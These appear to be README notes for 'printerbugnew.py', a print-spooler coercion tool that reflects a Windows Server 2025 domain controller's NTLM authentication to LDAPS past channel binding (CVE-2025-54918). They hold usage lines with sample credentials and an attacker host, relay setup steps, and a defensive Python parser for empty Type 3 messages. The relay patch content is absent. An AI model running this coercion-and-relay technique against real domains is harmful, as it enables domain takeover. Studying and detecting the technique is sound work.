printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152
- Target must be Windows 11 22H2+ or Server 2025 (RPC over TCP default)
- For older versions, spoolss uses RPC over Named Pipes (SMB)
- Ensure ports 135 and dynamic RPC ports (49152-65535) are open
- Start Responder or ntlmrelayx on attacker_host to capture auth
- Kerberos fails in this case due to a bad SPN from the spooler, forcing NTLM fallback.
- Find the target spooler’s RPC/TCP port by querying the target Endpoint Mapper (EPM) on TCP/135 for the interface UUID 12345678-1234-abcd-ef00-0123456789ab. You can use rpcdump.py, PortQry, or any tool you prefer - or just implement the EPM lookup directly in this code ;)
- Based on https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
This exploit via reflection works only on W2025 with the "new" printerbug (DCERPC instead of Named Pipes).
You'll need to modify ntlmrelayx at a couple of points for it to work. After that, you can remotely trigger the printer bug on a W2025 DC and reflect the authentication via LDAPS(!), even if Channel Binding is REQUIRED.
ldaprelayclient.py:
rpcrelayserver.py
and relay ;)
The vulnerability was fixed in September 2025 Patch Tuesday: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
The fix ensures that the MIC is always calculated, even when the Type 3 message is empty.
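An added detection-side example, not code from these notes or from printerbugnew.py: a parser for the MS-NLMP AUTHENTICATE_MESSAGE (Type 3) layout that flags the shape the fix is about, an empty LM/NT response carried with an all-zero MIC field, so captured binds can be reviewed. The sample message builder, the user name and the negotiate flags value are constructed for offline testing and are not taken from the page.

```python
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE = 3
# Six (Len, MaxLen, BufferOffset) descriptors follow the 12-byte header.
FIELD_NAMES = ("lm_response", "nt_response", "domain", "user",
               "workstation", "session_key")
MIC_OFFSET, MIC_LEN, PAYLOAD_WITH_MIC = 72, 16, 88


def parse_type3(blob: bytes) -> dict:
    """Return field lengths, MIC field presence and an 'empty_without_mic' verdict."""
    if len(blob) < 64 or blob[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", blob, 8)
    if msg_type != AUTHENTICATE:
        raise ValueError(f"expected Type 3, got Type {msg_type}")
    fields, offsets = {}, []
    for i, name in enumerate(FIELD_NAMES):
        length, _max, off = struct.unpack_from("<HHI", blob, 12 + 8 * i)
        fields[name] = length
        if length:
            offsets.append(off)
    (flags,) = struct.unpack_from("<I", blob, 60)
    # Version (8 bytes) and MIC (16 bytes) precede the payload, so a MIC field
    # can only exist when every non-empty buffer starts at or after offset 88.
    has_mic_field = len(blob) >= PAYLOAD_WITH_MIC and all(o >= PAYLOAD_WITH_MIC for o in offsets)
    mic = blob[MIC_OFFSET:MIC_OFFSET + MIC_LEN] if has_mic_field else b""
    empty = fields["nt_response"] == 0 and fields["lm_response"] == 0
    return {
        "flags": flags,
        "fields": fields,
        "has_mic_field": has_mic_field,
        "mic_is_zero": has_mic_field and mic == bytes(MIC_LEN),
        # The shape worth reviewing: no challenge response and no usable MIC.
        "empty_without_mic": empty and (not has_mic_field or mic == bytes(MIC_LEN)),
    }


def build_sample_type3(nt_response: bytes, mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Constructed sample Type 3 (user 'u', no domain) for offline testing."""
    user = "u".encode("utf-16-le")
    nt_off, user_off = PAYLOAD_WITH_MIC, PAYLOAD_WITH_MIC + len(nt_response)
    hdr = NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE)
    hdr += struct.pack("<HHI", 0, 0, nt_off)  # LM response: empty
    hdr += struct.pack("<HHI", len(nt_response), len(nt_response), nt_off)
    hdr += struct.pack("<HHI", 0, 0, nt_off)  # domain: empty
    hdr += struct.pack("<HHI", len(user), len(user), user_off)
    hdr += struct.pack("<HHI", 0, 0, nt_off)  # workstation: empty
    hdr += struct.pack("<HHI", 0, 0, nt_off)  # session key: empty
    hdr += struct.pack("<I", 0xE2088235) + bytes(8) + mic  # sample flags, version, MIC
    return hdr + nt_response + user
```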
Thanks to the author of this CVE for a valuable hint :)